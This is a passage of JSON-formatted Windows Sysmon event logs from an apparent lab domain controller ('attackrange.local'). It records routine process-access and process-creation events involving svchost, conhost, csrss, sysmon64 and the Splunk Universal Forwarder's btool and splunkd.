C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2947,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2948,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2949,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00105C080500}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00105C080500}","TargetProcessId":"1320","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2950,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nProcessGuid: {A837DB8D-0236-5F25-0000-001021090500}\r\nProcessId: 1436\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-00105C080500}\r\nParentProcessId: 1320\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","ProcessGuid":"{A837DB8D-0236-5F25-0000-001021090500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-00105C080500}","ParentProcessId":"1320","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.807\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-00105C080500}\r\nSourceProcessId: 1320\r\nSourceThreadId: 1324\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-001021090500}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.807","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-00105C080500}","SourceProcessId":"1320","SourceThreadId":"1324","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-001021090500}","TargetProcessId":"1436","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-001021090500}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-001021090500}","TargetProcessId":"1436","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.822","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.822\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 